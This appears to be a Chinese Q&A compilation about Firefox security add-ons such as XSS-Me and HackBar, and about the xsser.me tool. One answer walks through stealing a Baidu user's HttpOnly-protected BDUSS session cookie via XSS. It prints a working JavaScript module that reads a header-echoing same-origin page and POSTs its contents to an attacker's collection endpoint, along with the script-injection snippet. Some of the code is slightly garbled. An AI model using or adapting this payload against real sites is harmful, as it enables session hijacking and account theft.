本文目录一览:
- 1、firefox插件xss-me
- 2、如何通过 XSS 获取受 http-only さcookie
- 3、xsser.me 是什么
- 4、有什么比较好的火狐组件,简单介绍下功能。
- 5、如何安装火狐浏览器xssme插件
firefox插件xss-me
尊敬的用户,您好!很高兴为您答疑。
一般扩展的源码可以访问扩展作者的个人主页寻找。而该扩展开发语言可以参看:实战 Firefox 插件扩展开发。
希望我的回答对您有所帮助,如有疑问,欢迎继续咨询我们。
如何通过 XSS 获取受 http-only さcookie
该测试页返回了完整的http头,其中也包括了完整的cookie。混贴吧圈的应该都知道BDUSS是最关键的字段,同时该字段是受http-only保护的,百度SRC之前也因此下调了XSS的评分标准。
02.jpg
这样,我们只要利用XSS平台的"指定页面源码读取"模块即可通过XSS获取用户的完整cookie。该模块代码如下:
code 区域
var u = ';id={projectId}';
var cr;
if (document.charset) {
cr = document.charset
} else if (document.characterSet) {
cr = document.characterSet
};
function createXmlHttp() {
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest()
} else {
var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
for (var n = 0; n MSXML.length; n++) {
try {
xmlHttp = new ActiveXObject(MSXML[n]);
break
} catch(e) {}
}
}
}
createXmlHttp();
xmlHttp.onreadystatechange = writeSource;
xmlHttp.open("GET", "", true);
xmlHttp.send(null);
function postSource(cc) {
createXmlHttp();
url = u;
cc = "mycode=" + cc;
xmlHttp.open("POST", url, true);
xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlHttp.setRequestHeader("Content-length", cc.length);
xmlHttp.setRequestHeader("Connection", "close");
xmlHttp.send(cc)
}
function writeSource() {
if (xmlHttp.readyState == 4) {
var c = new postSource(xmlHttp.responseText)
}
}
由于是用xmlHttpRequest的形式读源码,且 的 Access-Control-Allow-Origin 为空,即默认不允许跨域,所以我们必须在同域下才能用xmlHttpRequest获取到完整的cookie。
我在 中有提到, 可以自由构造XSS。我们向该页面写入如下代码:
code 区域
titlewooyun.org/title
p超威蓝猫@wooyun.org/p
script src=;/script
xsser.me 是什么
xsser.me是一款xss评估测试工具,可以方便的进行黑盒安全测试和进行安全培训的演示等等。
有什么比较好的火狐组件,简单介绍下功能。
1. Add N Edit Cookies 查看和修改本地的Cookie,Cookie欺骗必备。
2. User Agent Switcher 修改浏览器的User Agent,可以用来XSS。
3. RefControl 修改Referer引用,也可以用来XSS或者突破一些防盗链。关于Referer XSS的可以参考利用雅虎站长工具跨站给管理员挂马。
4.Live HTTP Headers 记录本地的Get和Post数据,并可修改数据后重新提交。
5. Poster 用来Post和Get数据。
6. HackBar 小工具包,包含一些常用的工具。(SQL injection,XSS,加密等)
7. XSS-Me SQL Inject-MeAccess-Me 分别用来检测XSS,SQL Inject和Access缺陷。
8. Firebug 可以编辑、测试和实时观察任何页面中的 CSS,HTML,和JavaScript,控制查看的数据和 HTTP/HTTPS 的消息头和 POST 参数,还有 DOM Inspector 来检查任何的 HTM L或 CSS 组成。ca3daebf25WtjLlo
9. Web Developer
------------以上是帮你搜索的!------------
-------------这是很安全,很权威的组件下载点----------
个人:
必备的:网页视频浏览必备的 叫什么A*** FLASH 的,如果没下它在标签栏下会提示你的
美化的:就是主题包!你如果是在windows下的火狐,不用什么好下载的他已经自带好多,也可自己做!
语言类:是用火狐中国,也就不用担心了都有! 我现在的是firefox(en-GB)/(zh-cn)3.5.2....
插件就好多了!
个人观点:
相信你是个狐迷 好处我就不说了!缺点,火狐实用性不是很好!1、上次为了与迅雷紧密结合,弄了我半天!2、我进淘宝时,就安全控件下载就是一道很高的槛。3、我常常用网上银行,呵呵!无奈!4、还有好多限制...
我现在基本上不用windows 操作系统了,用的是其他的系统就是火狐浏览器,还是比较留恋遨游...
兄台 能给分不?
如何安装火狐浏览器xssme插件
这个漏洞检测插件已经停止维护很久了,目前已没有下载安装途径。